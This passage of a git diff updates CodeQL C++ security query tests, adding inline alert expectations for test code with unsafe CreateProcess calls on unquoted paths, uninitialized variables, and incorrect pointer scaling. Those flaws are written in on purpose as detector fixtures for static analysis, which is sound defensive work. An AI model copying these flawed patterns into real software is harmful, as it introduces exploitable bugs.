get_unique_ptr().get(); // BAD // $ Alert auto s1c = get_unique_ptr()->s; // GOOD - auto s1d = &(get_unique_ptr()->s); // BAD - auto s2 = b1 ? get_unique_ptr().get() : nullptr; // BAD - auto s3 = b2 ? nullptr :get_unique_ptr().get(); // BAD + auto s1d = &(get_unique_ptr()->s); // BAD // $ Alert + auto s2 = b1 ? get_unique_ptr().get() : nullptr; // BAD // $ Alert + auto s3 = b2 ? nullptr :get_unique_ptr().get(); // BAD // $ Alert const S* s4; - s4 = get_unique_ptr().get(); // BAD + s4 = get_unique_ptr().get(); // BAD // $ Alert call(get_unique_ptr().get()); // GOOD call(b1 ? get_unique_ptr().get() : nullptr); // GOOD @@ -169,14 +169,14 @@ const S* test1(bool b1, bool b2) { call_by_ref(*get_unique_ptr()); // GOOD std::vector v1; - v1.push_back(get_unique_ptr().get()); // BAD + v1.push_back(get_unique_ptr().get()); // BAD // $ Alert - S* s5[] = { get_unique_ptr().get() }; // BAD + S* s5[] = { get_unique_ptr().get() }; // BAD // $ Alert S s6 = b1 ? *get_unique_ptr() : *get_unique_ptr(); // GOOD - S& s7 = b1 ? *get_unique_ptr() : *get_unique_ptr(); // BAD + S& s7 = b1 ? *get_unique_ptr() : *get_unique_ptr(); // BAD // $ Alert - return &*get_unique_ptr(); // BAD + return &*get_unique_ptr(); // BAD // $ Alert } void test2(bool b1, bool b2) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.cpp index 547237c2bea7..cc314f35bc5a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.cpp @@ -100,31 +100,31 @@ void positiveTestCases() wchar_t* lpApplicationName = NULL; // CreateProcessA - CreateProcessA( //BUG + CreateProcessA( //BUG // $ Alert NULL, (char*)"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcessW - CreateProcessW( //BUG + CreateProcessW( //BUG // $ Alert NULL, (wchar_t*)L"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcess - CreateProcess( //BUG + CreateProcess( //BUG // $ Alert NULL, (wchar_t*)L"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // lpCommandLine as hardcoded variable - CreateProcess( //BUG + CreateProcess( //BUG // $ Alert NULL, (wchar_t*)lpCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcessWithTokenW - CreateProcessWithTokenW( //BUG + CreateProcessWithTokenW( //BUG // $ Alert h, LOGON_WITH_PROFILE, NULL, @@ -132,7 +132,7 @@ void positiveTestCases() 0, NULL, NULL, NULL, NULL); // CreateProcessWithLogonW - CreateProcessWithLogonW( //BUG + CreateProcessWithLogonW( //BUG // $ Alert (const wchar_t*)L"UserName", (const wchar_t*)L"CONTOSO", (const wchar_t*)L"", @@ -142,21 +142,21 @@ void positiveTestCases() 0, NULL, NULL, NULL, NULL); // CreateProcessAsUserA - CreateProcessAsUserA( //BUG + CreateProcessAsUserA( //BUG // $ Alert h, NULL, (char*)"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcessAsUserW - CreateProcessAsUserW( //BUG + CreateProcessAsUserW( //BUG // $ Alert h, NULL, (wchar_t*)L"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcessAsUser - CreateProcessAsUser( //BUG + CreateProcessAsUser( //BUG // $ Alert h, NULL, (wchar_t*)L"C:\\Program Files\\MyApp", @@ -164,7 +164,7 @@ void positiveTestCases() // CreateProcess with a hardcoded variable for application Name (NULL) // Variation: tab instead of space - CreateProcess( //BUG + CreateProcess( //BUG // $ Alert lpApplicationName, (wchar_t*)L"C:\\Program\tFiles\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); @@ -173,7 +173,7 @@ void positiveTestCases() void PositiveTestCasesWithCmdLineParameter(wchar_t* lpCommandLine) { // lpCommandLine as variable - CreateProcess( //BUG - Depends on the caller + CreateProcess( //BUG - Depends on the caller // $ Alert NULL, lpCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); @@ -206,7 +206,7 @@ void PositiveTestCasesWithAppNameParameter(wchar_t* lpApplicationName) { void* h = 0; - CreateProcessWithTokenW( //BUG - Depends on the caller. In this case the caller sends NULL + CreateProcessWithTokenW( //BUG - Depends on the caller. In this case the caller sends NULL // $ Alert h, LOGON_WITH_PROFILE, lpApplicationName, @@ -255,7 +255,7 @@ void TestCaseProbablyBug() lpApplicationName = (const wchar_t*)L"app.exe"; } - CreateProcessWithLogonW( // BUG (Probably - depends on a condition that may be false) + CreateProcessWithLogonW( // BUG (Probably - depends on a condition that may be false) // $ Alert (const wchar_t*)L"UserName", (const wchar_t*)L"CONTOSO", (const wchar_t*)L"", diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.qlref index f2012f0c678d..75d4eecadc1d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-428/UnsafeCreateProcessCall.ql \ No newline at end of file +query: Security/CWE/CWE-428/UnsafeCreateProcessCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/ConditionallyUninitializedVariable.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/ConditionallyUninitializedVariable.qlref index 5150d627257c..81d04da795eb 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/ConditionallyUninitializedVariable.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/ConditionallyUninitializedVariable.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-457/ConditionallyUninitializedVariable.ql +query: Security/CWE/CWE-457/ConditionallyUninitializedVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/examples.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/examples.cpp index ccb15904d025..b895621db06e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/examples.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/examples.cpp @@ -35,7 +35,7 @@ void notifyGood(int deviceNumber) { int notifyBad(int deviceNumber) { DeviceConfig config; - initDeviceConfig(&config, deviceNumber); + initDeviceConfig(&config, deviceNumber); // $ Alert // BAD: Using config without checking the status code that is returned if (config.isEnabled) { notifyChannel(config.channel); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/test.cpp index a3c9b0a24aaa..46b9cbf8b3e7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/test.cpp @@ -19,7 +19,7 @@ void test1() int a, b, c, d, e, f; int result1, result2; - maybeInitialize1(&a); // BAD (initialization not checked) + maybeInitialize1(&a); // BAD (initialization not checked) // $ Alert use(a); if (maybeInitialize1(&b) == 1) // GOOD @@ -65,7 +65,7 @@ void test2() { int a, b; - maybeInitialize2(&a); // BAD (initialization not checked) + maybeInitialize2(&a); // BAD (initialization not checked) // $ Alert use(a); if (maybeInitialize2(&b)) // GOOD diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected index 6773f5aef942..d35519d860fb 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected @@ -1,3 +1,18 @@ +#select +| errors.cpp:14:18:14:18 | x | errors.cpp:13:7:13:7 | definition of x | errors.cpp:13:7:13:7 | definition of x | The variable $@ may not be initialized at this access. | errors.cpp:13:7:13:7 | x | x | +| test.cpp:12:6:12:8 | foo | test.cpp:11:6:11:8 | definition of foo | test.cpp:11:6:11:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:11:6:11:8 | foo | foo | +| test.cpp:113:6:113:8 | foo | test.cpp:111:6:111:8 | definition of foo | test.cpp:111:6:111:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:111:6:111:8 | foo | foo | +| test.cpp:227:3:227:3 | x | test.cpp:226:7:226:7 | definition of x | test.cpp:226:7:226:7 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:226:7:226:7 | x | x | +| test.cpp:251:13:251:13 | i | test.cpp:249:6:249:6 | definition of i | test.cpp:249:6:249:6 | definition of i | The variable $@ may not be initialized at this access. | test.cpp:249:6:249:6 | i | i | +| test.cpp:344:10:344:10 | a | test.cpp:341:7:341:7 | definition of a | test.cpp:341:7:341:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:341:7:341:7 | a | a | +| test.cpp:377:10:377:10 | a | test.cpp:366:7:366:7 | definition of a | test.cpp:366:7:366:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:366:7:366:7 | a | a | +| test.cpp:386:9:386:11 | val | test.cpp:367:6:367:8 | definition of val | test.cpp:367:6:367:8 | definition of val | The variable $@ may not be initialized at this access. | test.cpp:367:6:367:8 | val | val | +| test.cpp:425:10:425:10 | j | test.cpp:422:9:422:9 | definition of j | test.cpp:422:9:422:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:422:9:422:9 | j | j | +| test.cpp:444:9:444:9 | j | test.cpp:439:9:439:9 | definition of j | test.cpp:439:9:439:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:439:9:439:9 | j | j | +| test.cpp:462:2:462:2 | x | test.cpp:460:6:460:6 | definition of x | test.cpp:460:6:460:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:460:6:460:6 | x | x | +| test.cpp:468:7:468:7 | x | test.cpp:466:6:466:6 | definition of x | test.cpp:466:6:466:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:466:6:466:6 | x | x | +| test.cpp:475:2:475:2 | x | test.cpp:472:6:472:6 | definition of x | test.cpp:472:6:472:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:472:6:472:6 | x | x | +| test.cpp:482:7:482:7 | x | test.cpp:479:6:479:6 | definition of x | test.cpp:479:6:479:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:479:6:479:6 | x | x | edges nodes | errors.cpp:13:7:13:7 | definition of x | semmle.label | definition of x | @@ -14,18 +29,3 @@ nodes | test.cpp:466:6:466:6 | definition of x | semmle.label | definition of x | | test.cpp:472:6:472:6 | definition of x | semmle.label | definition of x | | test.cpp:479:6:479:6 | definition of x | semmle.label | definition of x | -#select -| errors.cpp:14:18:14:18 | x | errors.cpp:13:7:13:7 | definition of x | errors.cpp:13:7:13:7 | definition of x | The variable $@ may not be initialized at this access. | errors.cpp:13:7:13:7 | x | x | -| test.cpp:12:6:12:8 | foo | test.cpp:11:6:11:8 | definition of foo | test.cpp:11:6:11:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:11:6:11:8 | foo | foo | -| test.cpp:113:6:113:8 | foo | test.cpp:111:6:111:8 | definition of foo | test.cpp:111:6:111:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:111:6:111:8 | foo | foo | -| test.cpp:227:3:227:3 | x | test.cpp:226:7:226:7 | definition of x | test.cpp:226:7:226:7 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:226:7:226:7 | x | x | -| test.cpp:251:13:251:13 | i | test.cpp:249:6:249:6 | definition of i | test.cpp:249:6:249:6 | definition of i | The variable $@ may not be initialized at this access. | test.cpp:249:6:249:6 | i | i | -| test.cpp:344:10:344:10 | a | test.cpp:341:7:341:7 | definition of a | test.cpp:341:7:341:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:341:7:341:7 | a | a | -| test.cpp:377:10:377:10 | a | test.cpp:366:7:366:7 | definition of a | test.cpp:366:7:366:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:366:7:366:7 | a | a | -| test.cpp:386:9:386:11 | val | test.cpp:367:6:367:8 | definition of val | test.cpp:367:6:367:8 | definition of val | The variable $@ may not be initialized at this access. | test.cpp:367:6:367:8 | val | val | -| test.cpp:425:10:425:10 | j | test.cpp:422:9:422:9 | definition of j | test.cpp:422:9:422:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:422:9:422:9 | j | j | -| test.cpp:444:9:444:9 | j | test.cpp:439:9:439:9 | definition of j | test.cpp:439:9:439:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:439:9:439:9 | j | j | -| test.cpp:462:2:462:2 | x | test.cpp:460:6:460:6 | definition of x | test.cpp:460:6:460:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:460:6:460:6 | x | x | -| test.cpp:468:7:468:7 | x | test.cpp:466:6:466:6 | definition of x | test.cpp:466:6:466:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:466:6:466:6 | x | x | -| test.cpp:475:2:475:2 | x | test.cpp:472:6:472:6 | definition of x | test.cpp:472:6:472:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:472:6:472:6 | x | x | -| test.cpp:482:7:482:7 | x | test.cpp:479:6:479:6 | definition of x | test.cpp:479:6:479:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:479:6:479:6 | x | x | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.qlref index 834d9576ddc2..402ebbae6eb1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/UninitializedLocal.ql +query: Likely Bugs/Memory Management/UninitializedLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/errors.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/errors.cpp index 07bb61f943ed..ae7e767158c5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/errors.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/errors.cpp @@ -10,6 +10,6 @@ void * operator new(unsigned long, bool); void operator delete(void*, bool); int f2() { - int x; - new(true) int (x); // BAD, ignore implicit error expression + int x; // $ Source Sink + new(true) int (x); // BAD, ignore implicit error expression // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/test.cpp index 14c00675545b..408781de438e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/test.cpp @@ -8,8 +8,8 @@ void test1() { } void test2() { - int foo; - use(foo); // BAD + int foo; // $ Source Sink + use(foo); // BAD // $ Alert } void test3(bool b) { @@ -108,9 +108,9 @@ void test12() { } void test13() { - int foo; + int foo; // $ Source Sink &foo; - use(foo); // BAD + use(foo); // BAD // $ Alert } void init(int* p) { *p = 1; } @@ -223,8 +223,8 @@ void test19() { void test20() { - int x; - x += 0; // BAD + int x; // $ Source Sink + x += 0; // BAD // $ Alert use(x); } @@ -246,9 +246,9 @@ void test21() MyValue v1(1); MyValue v2; MyValue v3; - int i; + int i; // $ Source Sink - v3 = v1 >> i; // BAD: i is not initialized + v3 = v1 >> i; // BAD: i is not initialized // $ Alert v3 = v2 >> 1; // BAD: v2 is not initialized [NOT DETECTED] } @@ -338,10 +338,10 @@ int test28() { } int test29() { - bool a, b = true, c = true; + bool a, b = true, c = true; // $ Source Sink int val; - while ((a && b) || c) // BAD (a is uninitialized) + while ((a && b) || c) // BAD (a is uninitialized) // $ Alert { val = 1; b = false; @@ -363,8 +363,8 @@ int test30() { int test31() { bool loop = true; bool stop = false; - bool a, b = true, c = true; - int val; + bool a, b = true, c = true; // $ Source Sink + int val; // $ Source Sink while (loop || false) { @@ -374,7 +374,7 @@ int test31() { { stop = true; } - while ((a && b) || c) // BAD (a is uninitialized) + while ((a && b) || c) // BAD (a is uninitialized) // $ Alert { b = false; c = false; @@ -383,7 +383,7 @@ int test31() { { } while (false); - return val; // BAD + return val; // BAD // $ Alert } int test32() { @@ -419,10 +419,10 @@ int test34() { } int test35() { - int i, j; + int i, j; // $ Source Sink for (int i = 0; i < 10; i++, j = 1) { - return j; // BAD + return j; // BAD // $ Alert } } @@ -436,12 +436,12 @@ int test36() { } int test38() { - int i, j; + int i, j; // $ Source Sink for (int i = 0; false; i++, j = 1) { } - return j; // BAD + return j; // BAD // $ Alert } void test39() { @@ -457,29 +457,29 @@ void test40() { } void test41() { - int x; + int x; // $ Source Sink - x++; // BAD + x++; // BAD // $ Alert } void test42() { - int x; + int x; // $ Source Sink - void(x++); // BAD + void(x++); // BAD // $ Alert } void test43() { - int x; + int x; // $ Source Sink int y = 1; - x + y; // BAD + x + y; // BAD // $ Alert } void test44() { - int x; + int x; // $ Source Sink int y = 1; - void(x + y); // BAD + void(x + y); // BAD // $ Alert } enum class State { StateA, StateB, StateC }; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScaling.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScaling.qlref index 2a673380ba16..1c96d9e4607e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScaling.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScaling.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-468/IncorrectPointerScaling.ql \ No newline at end of file +query: Security/CWE/CWE-468/IncorrectPointerScaling.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingChar.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingChar.qlref index d14a9ca77f22..bc325696a764 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingChar.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingChar.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-468/IncorrectPointerScalingChar.ql +query: Security/CWE/CWE-468/IncorrectPointerScalingChar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingVoid.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingVoid.qlref index 46650070ece4..1627ede63028 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingVoid.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingVoid.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-468/IncorrectPointerScalingVoid.ql +query: Security/CWE/CWE-468/IncorrectPointerScalingVoid.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/test.cpp index a4d42f4521f2..9f6b046a90bd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/test.cpp @@ -10,7 +10,7 @@ int test2(int i) { char *charPointer = (char *)intArray; // BAD [FALSE NEGATIVE of IncorrectPointerScaling.ql]: the pointer arithmetic // uses type char*, so the offset is not scaled by sizeof(int). - return *(int *)(charPointer + i); + return *(int *)(charPointer + i); // $ Alert[cpp/incorrect-pointer-scaling-char] } int test3(int i) { @@ -47,7 +47,7 @@ char* test7( int *p = (int*)x; // BAD: the type of x is double*, but it has been cast to int* // so the pointer add is scaled by sizeof(int). - return (char *)(p + 1); + return (char *)(p + 1); // $ Alert[cpp/suspicious-pointer-scaling] } char* test8( @@ -74,7 +74,7 @@ char* test10(int* x) { // only part of an integer is architecture-dependent. If the pointer returned // from this function is dereferenced, the result will depend on int size and // endianness regardless of whether the offset is scaled by sizeof(int). - return (char*)x + 1; + return (char*)x + 1; // $ Alert[cpp/incorrect-pointer-scaling-char] } char* test10b(int* x) { @@ -91,7 +91,7 @@ short* test10c(int* x) { // from this function is dereferenced, the result will depend on int size and // endianness regardless of whether the offset is scaled by (sizeof(int) / // sizeof(short)). - return (short*)x + 1; + return (short*)x + 1; // $ Alert[cpp/suspicious-pointer-scaling] } int test11(int* x, int* y) { @@ -116,7 +116,7 @@ int test13(mystruct *p) { // computes the byte offset of a member. Code like this is commonly seen in // projects that use C/C++ for their low-level control over memory. int offset = (char *)&p->int_field - (char *)p; - return *(int *)((char*)p + offset); + return *(int *)((char*)p + offset); // $ Alert[cpp/incorrect-pointer-scaling-char] } int test14(int arr[12][12]) { @@ -127,22 +127,22 @@ int test14(int arr[12][12]) { int test15(int arr[12][12]) { // BAD: the type of the pointer is int but it has been scaled by sizeof(short) - return *(int*)((short*) arr + 1); + return *(int*)((short*) arr + 1); // $ Alert[cpp/suspicious-pointer-scaling] } void* test16(int* x) { // BAD: void pointer arithmetic is not portable across compilers - return (void*)x + 1; + return (void*)x + 1; // $ Alert[cpp/suspicious-pointer-scaling-void] } void* test17(int* x) { // BAD: void pointer arithmetic is not portable across compilers - return (void*)x + sizeof(int); + return (void*)x + sizeof(int); // $ Alert[cpp/suspicious-pointer-scaling-void] } int test18(int i) { int intArray[2][2] = { {1, 2}, {3, 4} }; char *charPointer = (char *)intArray; // BAD: the pointer arithmetic uses type char*, so the offset is not scaled by sizeof(int). - return *(int *)(charPointer + i); + return *(int *)(charPointer + i); // $ Alert[cpp/incorrect-pointer-scaling-char] } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/SuspiciousAddWithSizeof.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/SuspiciousAddWithSizeof.qlref index 8c2dec10e170..bcea0a075987 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/SuspiciousAddWithSizeof.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/SuspiciousAddWithSizeof.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-468/SuspiciousAddWithSizeof.ql \ No newline at end of file +query: Security/CWE/CWE-468/SuspiciousAddWithSizeof.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/buildless.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/buildless.cpp index b0b590fba699..bcc4400b293e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/buildless.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/buildless.cpp @@ -2,8 +2,8 @@ void test_buildless(const char *p_c, const short *p_short, const int *p_int, const uint8_t *p_8, const uint16_t *p_16, const uint32_t *p_32) { *(p_c + sizeof(int)); // GOOD (`sizeof(char)` is 1) - *(p_short + sizeof(int)); // BAD - *(p_int + sizeof(int)); // BAD + *(p_short + sizeof(int)); // BAD // $ Alert + *(p_int + sizeof(int)); // BAD // $ Alert *(p_8 + sizeof(int)); // GOOD (`sizeof(uint8_t)` is 1, but there's an error in the type) *(p_16 + sizeof(int)); // BAD [NOT DETECTED] *(p_32 + sizeof(int)); // BAD [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/test.cpp index fa2bd934cca2..11073db5d6df 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/test.cpp @@ -3,7 +3,7 @@ int test1(int i) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer + (i * sizeof(int))); + return *(intPointer + (i * sizeof(int))); // $ Alert } int test2(int i) { @@ -11,7 +11,7 @@ int test2(int i) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer - (i * sizeof(int))); + return *(intPointer - (i * sizeof(int))); // $ Alert } int test3(int i) { @@ -19,7 +19,7 @@ int test3(int i) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer + sizeof(int)); + return *(intPointer + sizeof(int)); // $ Alert } int test4(int i) { @@ -27,7 +27,7 @@ int test4(int i) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer - sizeof(int)); + return *(intPointer - sizeof(int)); // $ Alert } int test5(int i, int j) { @@ -35,7 +35,7 @@ int test5(int i, int j) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer + (i * sizeof(int) * j)); + return *(intPointer + (i * sizeof(int) * j)); // $ Alert } void test6(int i) { @@ -58,7 +58,7 @@ void test7(int i) { int v; v = *(intPointer + i); // GOOD - v = *(intPointer + (i * sizeof(int))); // BAD: scaled twice by sizeof(int) + v = *(intPointer + (i * sizeof(int))); // BAD: scaled twice by sizeof(int) // $ Alert v = *(charPointer + i); // GOOD (actually rather dubious, but this could be correct code) v = *(charPointer + (i * sizeof(int))); // GOOD v = *(int *)(voidPointer + i); // GOOD (actually rather dubious, but this could be correct code) @@ -86,7 +86,7 @@ class MyTest8Class myIntsPointer((myInt *)malloc(sizeof(MyABC) * 2)) { myChar *secondPtr = myCharsPointer + sizeof(MyABC); // GOOD - myInt *secondPtrInt = myIntsPointer + sizeof(MyABC); // BAD + myInt *secondPtrInt = myIntsPointer + sizeof(MyABC); // BAD // $ Alert } private: diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected index e217064d1dfc..58f42bec0c84 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected @@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.qlref index 0c88835bf1fc..0cb5a0a34d75 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-497/ExposedSystemData.ql \ No newline at end of file +query: Security/CWE/CWE-497/ExposedSystemData.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected index 3fc58925ff7b..62c2ad7896b4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected @@ -1,8 +1,8 @@ +#select +| tests.c:70:70:70:77 | *password | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | This operation potentially exposes sensitive system data from $@. | 